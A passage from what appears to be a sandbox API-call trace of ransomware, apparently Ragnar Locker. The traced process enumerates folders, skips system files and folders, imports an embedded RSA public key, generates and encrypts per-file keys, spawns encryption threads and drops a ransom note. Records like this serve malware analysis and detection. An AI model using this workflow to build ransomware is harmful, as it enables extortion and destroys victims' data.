fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0173.472] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf4bc93a4, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf4bc93a4, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.473] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4bc4597, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4bc4597, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0173.473] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.473] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0173.473] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0173.473] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0173.473] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0173.473] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.473] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0173.473] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned=".rtf" [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0173.473] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0173.474] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0173.474] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0173.474] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0173.474] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0173.474] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0173.474] GetProcessHeap () returned 0x3520000 [0173.474] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0173.476] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" [0173.476] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0173.476] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.476] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0173.476] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned=".xml" [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0173.476] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0173.477] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0173.477] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0173.477] GetProcessHeap () returned 0x3520000 [0173.477] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0173.479] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" [0173.479] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0173.479] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1038\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0173.479] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0173.479] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned=".dll" [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0173.479] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0173.480] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0173.480] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0173.480] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0173.480] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0173.480] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0173.480] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0173.480] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0173.480] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0173.480] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0173.480] GetProcessHeap () returned 0x3520000 [0173.480] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x35868e0 [0173.480] CryptAcquireContextW (in: phProv=0x35868e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x35868e0*=0x3556330) returned 1 [0173.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0173.481] GetProcessHeap () returned 0x3520000 [0173.481] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358bf08 [0173.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358bf08, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0173.481] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0173.481] GetProcessHeap () returned 0x3520000 [0173.481] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0173.481] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0173.481] GetProcessHeap () returned 0x3520000 [0173.481] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358bf08 | out: hHeap=0x3520000) returned 1 [0173.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0173.482] CryptImportPublicKeyInfo (in: hCryptProv=0x3556330, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x35868e4 | out: phKey=0x35868e4*=0x35481c0) returned 1 [0173.482] GetProcessHeap () returned 0x3520000 [0173.482] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0173.482] LocalFree (hMem=0x35948f0) returned 0x0 [0173.482] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556b28) returned 1 [0173.483] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0173.483] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0173.483] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0173.486] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35564c8) returned 1 [0173.487] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0173.487] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.487] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0173.579] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35564c8) returned 1 [0173.580] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0173.580] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.580] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0173.591] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0173.592] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0173.592] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.592] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0173.594] CryptEncrypt (in: hKey=0x35481c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.595] GetLastError () returned 0x80090016 [0173.595] CryptEncrypt (in: hKey=0x35481c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.595] GetLastError () returned 0x80090016 [0173.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xd98) returned 0x3f0 [0173.605] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556b28) returned 1 [0173.606] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0173.606] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0173.606] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0173.608] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35565d8) returned 1 [0173.609] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0173.609] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0173.609] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0173.615] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35564c8) returned 1 [0173.615] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0173.615] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.616] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0173.618] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0173.618] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0173.619] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0173.619] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0173.621] CryptEncrypt (in: hKey=0x35481c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.621] GetLastError () returned 0x80090016 [0173.621] CryptEncrypt (in: hKey=0x35481c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0173.622] GetLastError () returned 0x80090016 [0173.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xfc0) returned 0x3b4 [0173.623] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0173.870] GetProcessHeap () returned 0x3520000 [0173.870] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35868e0 | out: hHeap=0x3520000) returned 1 [0173.870] CloseHandle (hObject=0x3f0) returned 1 [0173.870] GetProcessHeap () returned 0x3520000 [0173.870] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0173.871] CloseHandle (hObject=0x3b4) returned 1 [0173.871] GetProcessHeap () returned 0x3520000 [0173.871] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0173.872] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0173.872] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0173.873] lstrcmpiW (lpString1="1040", lpString2=".") returned 1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="..") returned 1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Windows") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Windows.old") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Tor browser") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Internet Explorer") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Google") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Opera") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Opera Software") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Mozilla") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="Mozilla Firefox") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="$Recycle.Bin") returned 1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="ProgramData") returned -1 [0173.873] lstrcmpiW (lpString1="1040", lpString2="All Users") returned -1 [0173.873] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0173.873] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1040" | out: lpString1="1040") returned="1040" [0173.873] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\" [0173.873] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1040\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\" [0173.873] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\!$R4GN4R_B8CF767A$!.txt" [0173.873] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1040\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0173.878] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1040\\*.*" [0173.878] GetFullPathNameW (in: 